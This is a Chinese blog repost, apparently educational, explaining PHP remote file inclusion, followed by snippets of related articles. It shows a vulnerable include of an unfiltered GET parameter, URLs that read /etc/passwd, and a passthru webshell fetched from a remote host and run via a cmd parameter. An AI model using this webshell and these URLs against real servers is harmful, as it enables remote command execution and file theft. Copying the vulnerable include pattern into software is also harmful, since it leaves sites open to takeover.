RFI远程文件包含的漏洞

最新推荐文章于 2022-02-25 09:32:14 发布
最新推荐文章于 2022-02-25 09:32:14 发布
阅读量317 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/mujj/articles/3430576.html
版权

RFI(Remote File Inclusion) 远程文件包含漏洞,即服务器通过PHP的特性(函数)去包含任意文件时,
由于要包含的这个文件来源过滤不严格,从而可以去包含一个恶意文件,攻击者就可以远程构造一个特定
的恶意文件达到攻击目的。
文件包含的目的
程序员编写程序时,经常会把需要重复使用的代码写入一个单独的文件中,当需要调用这些代码时,再在
其他文件中包含调用代码的文件。
PHP中常用的包含调用函数有:
include(), require(), include_once(), require_once() .
include失败会弹出警告 而require则直接导致致命的错误
本地包含与远程包含
Include(“reg.php”)
If ($_GET [page]) {
Include $_GET [page];
} else {
Include “home.php”;
}

http://www.***.cn/php/main.php?page=reg.php
main.php 取得page值,执行“($_GET[page])”
如果page的值为空则包涵home.php否则include这就是本地包含
http://www.***.cn/php/main.php?page=http://www.***.cn/index.php
http://www.***.cn/index.php是一个远程的URL链接地址
这就是远程文件包含PHP配置文件中,allow_url_fopen默认是激活的

构造包含变量,产生包含漏洞 http://www.***.cn/php/main.php?page=why.php
如果why.php是并不存在的文件,那么include便会报错从而暴露出网站的物理路径
远程文件包含漏洞的利用---构造一个远程的php代码文件,传递到服务器上去
执行,以实现远程攻击的目的,这个也就是所谓的远程包含漏洞攻击了
1) 读取目标主机重要文件 可以使用…/…进行目录跳转
http://www.***.cn/php/main.php?page=/etc/passwd
2) 包含PHP木马,获得shellcode

If (get_magic_quote_gpc())
{$_REQUEST[“cmd”]=stripslashes($_REQUEST[“cmd”]);} //去掉字符串中的反斜线
Ini_set(“max_execution_time”,0) //不限制执行时间
Echo “
Binghe
"; //
Passthru($_REQUEST[“cmd”]); //运行cmd制定的命令
Echo “
Binghe
"; //
?>


这段php代码的意思是接受cmd制定的命令,调用passthru函数来执行binghe
把上面的代码保存为cmd.txt并存放在每个可以通过http访问的服务器上面
http://www.***.cn/cmd.txt
http://www.***.cn/php/main.php?page=http://www.***.cn/cmd.txt?cmd=ls
is是cmd的命令是查看,列目录,文件的意思,也可以使用其他的命令,然后就可以看到返回的结果了。

转载于:https://www.cnblogs.com/mujj/articles/3430576.html

weixin_30512089
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Remote & Local File Inclusion (RFI/LFI)-文件包含漏洞
seanyang_的博客
10-26 297
文件包含攻击,是指攻击者利用文件包含函数的参数引入文件,而Web应用又没有对该参数进行严格的过滤,导致引入文件中的恶意脚本或代码被解析、执行,攻击者获取服务器信息,甚至获取服务器权限。在PHP开发的Web应用中,脚本、图片、文本文档等被文件包含后,都会作为PHP脚本来解析。
远程文件包含漏洞案例讲解和演示
北冥有鱼
05-06 2204
我们可以通过php协议实现远程文件包含,这个include默认是关闭的,我们可以手动给他打开 远程包含漏洞危害级别要高出本地的很多,因为本地的利用是有限的,我们还需要去猜这个配置文件的漏洞,危害自然就低一些 比如我们可以在远端写一个一句话木马,放到本地去执行,实现了目标站点的远程控制 我们来到pikachu 随便提交一个 实际上他提交的是一个目标文件的路径 在测试站点中,直接写了一个fope...
LFI/RFI漏洞相关
weixin_33670713的博客
01-11 419
2019独角兽企业重金招聘Python工程师标准>>> ...
Web安全—文件包含漏洞RFI&LFI)
weixin_44431280的博客
02-25 1830
文件包含函数(RFI&LFI) ASP和JSP只能实现本地文件包含PHP既可以本地文件包含也可以远程文件包含 文件包含漏洞简介: 在日常的应用开发中,开发者会将常用的功能模块单独实现,然后通过inclue()等常见函数去单独调用对应功能的文件代码,如果此时文件包含被设置为了一个变量且未对输入的值进行过滤,攻击者恶意输入就会导致文件包含漏洞发生。 文件包含漏洞原理: 文件包含函数的值被定义为一个变量,可控制的函数变量值和恶意输入导致文件包含漏洞产生,不管什么扩展名的文件,只要被文件函数引用。 文件包
文件包含漏洞(LFI、RFI)(require()、include()函数)
Hardworking666的博客
05-10 4460
文章目录一、文件包含漏洞二、文件包含函数二、文件包含漏洞实例“百度杯”CTF比赛 2017 二月场include 一、文件包含漏洞 文件包含漏洞,是程序员在网站设计中,为方便自己在设计构架时,使用了一些包含的函数,在文件中,包含一个文件。 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。 这意味着可以创建供所有网页引用的标准页眉或菜单文件。 当页眉需要更新时,只更新一个包含文件就可以了,或者当向网站添加一张新页面时,仅仅需要修改一..
信息安全技术:远程文件包含漏洞.pptx
11-01
远程文件包含漏洞(Remote File Inclusion,简称RFI)是一种常见的网络安全问题,尤其在基于PHP的Web应用程序中较为常见。这种漏洞允许攻击者通过指定远程URL来包含并执行非预期的外部文件,从而可能对系统造成严重...
使用SMB共享来绕过php远程文件包含的限制执行RFI的利用
10-16
远程文件包含漏洞通常发生在应用程序允许用户输入用于决定要包含的文件路径时,如果这种输入没有经过充分验证,攻击者就能利用此漏洞执行任意代码。 首先,我们需要了解PHP的配置选项。`allow_url_include`和`allow...
文件包含原理解释-require
最新发布
05-13
不恰当的文件包含可能导致远程文件包含漏洞RFI,Remote File Inclusion),攻击者可以通过构造恶意URL来包含远程服务器上的文件,甚至执行任意代码。因此,我们应该始终确保包含的文件路径是可信的,并避免用户...
文件包含、命令执行漏洞、代码执行漏洞、基础代码审计
09-26
文件包含漏洞可以分为本地文件包含(Local File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)。本地文件包含是指包含的文件在本地服务器上,而远程文件包含是指包含的文件在远程服务器上。远程...
php包含漏洞自动挖掘分析工具下载 php远程包含漏洞
11-22
PHP包含漏洞通常分为两种类型:本地包含漏洞(Local File Inclusion, LFI)和远程包含漏洞(Remote File Inclusion, RFI)。LFI漏洞允许攻击者读取服务器上的任意文件,而RFI漏洞则更严重,因为它能让攻击者通过指定...
文件包含漏洞(File Inclusion)
diaomuxun8392的博客
08-21 366
简介 执行PHP文件时,可以通过文件包含函数加载另一个文件,当服务器开启allow_url_include选项时,就可以通过php的某些特性函数,利用url去动态包含文件并解析执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页...
文件包含漏洞(RFI)
diecai2192的博客
04-24 967
1文件包含漏洞简介 include require include_once require_once RFI综述 RFI是Remote File Inclusion的英文缩写,直译过来就是远程文件包含文件包含的目的是:程序员编写程序时,经常会把需要重复使用的代码写入一个单独的文件中,当需要调用这些代码时,再在其他文件中包含调用代码的文件。 一下是一个扫描端口PHP,可...
2021-7-5目录穿越ssrf配合RFI漏洞学习笔记转
qq_45290991的博客
07-05 286
目录 什么是目录遍历? 漏洞原理 实验 0x00  基础目录遍历 0x01  绝对路径 0x02  双写../绕过 0x03  URL编码绕过 0x04  绝对路径配合../ 0x05  截断文件后缀 防御   什么是目录遍历? 目录遍历(目录穿越)是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。 这可能包括应用程序代码和数据,后端系统的...
渗透测试学习-Remote File Inclusion shell
网络安全领域优质创作者
11-05 1264
http://10.11.1.133/1f2e73705207bdd6467e109c1606ed29-21213/111111111/slogin_lib.inc.php?slogin_path=http://10.11.0.86/ Let's kick shell-ish, Part 2: Remote File Inclusion shell – Techorganic – Musings from the brainpan cat /etc/fstab 搜索 reiserfs explo.
php代码审计文件包含,PHP代码审计之远程文件包含RFI
weixin_42512509的博客
03-10 305
有位叫做普瑞斯特的大牛针对PHP的web应用列出了下面几种攻击方式:1.命令注入(CommandInjection)2.eval注入(EvalInjection)3.客户端脚本攻击(ScriptInsertion)4.跨网站脚本攻击(CrossSiteScripting,XSS)5.SQL注入攻击(SQLinjection)6.跨网站请求伪造攻击(CrossSiteRequest...
php 怎么远程包含,利用PHP应用程序中的远程文件包含RFI)并绕过远程URL包含限制...
weixin_33125137的博客
03-18 611
前言文章讲诉了如何绕过远程URL包含限制。在PHP开发环境php.ini配置文件里”,allow_url_include“为“off”的情况下,不允许PHP加载远程HTTP或FTP url包含远程文件。但是使用SMB依旧可以加载。攻击思路攻击者需要配置SMB服务器,启用匿名浏览访问。利用有漏洞PHP代码从SMB共享里访问PHP Webshell。配置php.ini文件禁用 "allow_url_...
文件上传漏洞之——远程文件包含漏洞(RFI)
wsnbbz的博客
03-04 4542
定义 如果php.ini的配置选项allow_url_include为On的话,文件包含函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞。利用远程文件包含漏洞,可以直接执行任意命令 原理 同本地文件包含原理,只是参数可以换成一个远程的url地址,此时包含的文件不能为php文件,可写成txt或者图片马等等 文件包含的时候,无视文件格式,只要文件中有php代码,就会被执行 复现 dvwa lo...
LFI(本地文件包含)、RFI远程文件包含)、PHP封装协议(伪协议)安全问题学习
weixin_45116657的博客
02-04 2424
友情链接:https://www.cnblogs.com/LittleHann/p/3665062.html 目录 一、文件包含的基本概念 1、要想成功利用文件包含漏洞,需要满足下面的条件 (1)include()等函数通过动态变量的方式引入需要包含的文件 (2)用户能够控制该动态变量 二、LFI(Local File Include)本地文件包含 1、00字符截断 防御方法: ...
Web安全-文件包含漏洞
11-04
文件包含漏洞是一种最常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序。当应用程序使用黑客控制的变量构建可执行代码的路径时,文件包含漏洞会导致黑客任意控制运行时执行的文件。      文件包含漏洞分为本地文件包含(Loacl File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)。这种漏洞貌不惊人,却危害很大。通过文件包含漏洞,可以读取系统中的敏感文件,源代码文件等,如密码文件,通过对密码文件进行暴力破解。若破解成功则可获取操作系统的用户账户,甚至可通过开放的远程连接服务进行连接控制。另外不管是本地文件包含还是远程文件包含文件包含漏洞还可能导致执行任意代码。      本节课程通过代码讲解文件包含漏洞的实战,深入理解文件包含漏洞的原理。
请查阅资料并举出一个远程文件包含漏洞,简述其原理
04-13
远程文件包含漏洞(Remote File Inclusion, RFI)是一种常见的Web安全漏洞,其原理是攻击者利用目标网站处理用户输入时未能正确过滤和校验恶意输入,导致攻击者可以将任意远程文件包含到目标网站运行,从而实现攻击的目的。攻击者可以在远程文件中注入恶意代码,比如木马程序或者发送垃圾邮件的脚本,来窃取敏感信息、控制目标服务器甚至发起DDoS攻击。 一个经典的远程文件包含漏洞示例是在一个PHP程序中,将用户输入的GET参数直接包含到了一个动态包含语句中,攻击者可以构造一个特定的GET请求,将恶意的PHP代码包含到目标服务器上,从而执行攻击者的恶意代码。为防止RFI漏洞,可以对用户输入进行正确的过滤和校验,或者使用白名单机制,仅允许访问指定的文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值